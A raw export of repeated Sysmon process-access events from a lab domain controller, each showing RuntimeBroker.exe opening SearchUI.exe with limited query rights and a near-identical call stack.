12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
